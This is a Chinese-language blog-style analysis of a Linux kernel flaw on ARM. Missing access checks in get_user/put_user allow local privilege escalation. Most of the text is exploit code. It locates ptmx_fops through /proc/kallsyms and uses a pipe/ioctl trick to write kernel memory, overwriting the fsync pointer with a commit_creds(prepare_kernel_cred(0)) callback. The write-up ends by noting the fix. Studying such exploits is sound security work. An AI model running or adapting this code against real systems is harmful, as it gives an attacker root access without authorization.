/*
本文章由 莫灰灰 编写,转载请注明出处。
作者:莫灰灰 邮箱: [email protected]
*/
1.漏洞成因
Linux kernel对ARM上的get_user/put_user缺少訪问权限检查,本地攻击者可利用此漏洞读写内核内存,获取权限提升。
2.受影响的系统
Linux kernel 3.2.2
Linux kernel 3.2.13
Linux kernel 3.2.1
3.PoC分析
(1)从/proc/kallsyms文件里获得数据结构ptmx_fops的地址
void *ptmx_fops = kallsyms_get_symbol_address("ptmx_fops"); unsigned int ptmx_fops_fsync_address = (unsigned int)ptmx_fops + 0x38;
static void *kallsyms_get_symbol_address(const char *symbol_name) { FILE *fp; char function[BUFSIZ]; char symbol; void *address; int ret; fp = fopen("/proc/kallsyms", "r"); if (!fp) { printf("Failed to open /proc/kallsyms due to %s.", strerror(errno)); return 0; } while(!feof(fp)) { ret = fscanf(fp, "%p %c %s", &address, &symbol, function); if (ret != 3) { break; } if (!strcmp(function, symbol_name)) { fclose(fp); return address; } } fclose(fp); return NULL; }
static struct file_operations ptmx_fops;
struct file_operations { struct module *owner; loff_t (*llseek) (struct file *, loff_t, int); ssize_t (*read) (struct file *, char __user *, size_t, loff_t *); ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *); ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t); ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t); int (*iterate) (struct file *, struct dir_context *); unsigned int (*poll) (struct file *, struct poll_table_struct *); long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long); long (*compat_ioctl) (struct file *, unsigned int, unsigned long); int (*mmap) (struct file *, struct vm_area_struct *); int (*open) (struct inode *, struct file *); int (*flush) (struct file *, fl_owner_t id); int (*release) (struct inode *, struct file *); int (*fsync) (struct file *, loff_t, loff_t, int datasync); int (*aio_fsync) (struct kiocb *, int datasync); <span style="color:#ff0000;"><strong>int (*fasync) (int, struct file *, int);</strong></span> int (*lock) (struct file *, int, struct file_lock *); ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int); unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long); int (*check_flags)(int); int (*flock) (struct file *, int, struct file_lock *); ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int); ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int); int (*setlease)(struct file *, long, struct file_lock **); long (*fallocate)(struct file *file, int mode, loff_t offset, loff_t len); int (*show_fdinfo)(struct seq_file *m, struct file *f); };
if(pipe_write_value_at_address( ptmx_fops_fsync_address,(unsigned int)&ptmx_fsync_callback )){
/* obtain_root_privilege - userland callback function We set ptmx_fops.fsync to the address of this function Calling fysnc on the open /dev/ptmx file descriptor will result in this function being called in the kernel context We can the call the prepare/commit creds combo to escalate the processes priveledge. */ static void ptmx_fsync_callback(void) { commit_creds(prepare_kernel_cred(0)); }
static unsigned int pipe_write_value_at_address(unsigned long address, unsigned int value) { char data[4]; int pipefd[2]; int i; *(long *)&data = value; if (pipe(pipefd) == -1) { perror("pipe"); return 1; } for (i = 0; i < (int) sizeof(data) ; i++) { char buf[256]; buf[0] = 0; if (data[i]) { if (write(pipefd[1], buf, data[i]) != data[i]) { printf("error in write().\n"); break; } } if (ioctl(pipefd[0], FIONREAD, (void *)(address + i)) == -1) { perror("ioctl"); break; } if (data[i]) { if (read(pipefd[0], buf, sizeof buf) != data[i]) { printf("error in read().\n"); break; } } } close(pipefd[0]); close(pipefd[1]); return (i == sizeof (data)); }
int fd = open(PTMX_DEVICE, O_WRONLY); if(!fd) return 1; fsync(fd); close(fd);
在put_user之前加了个地址推断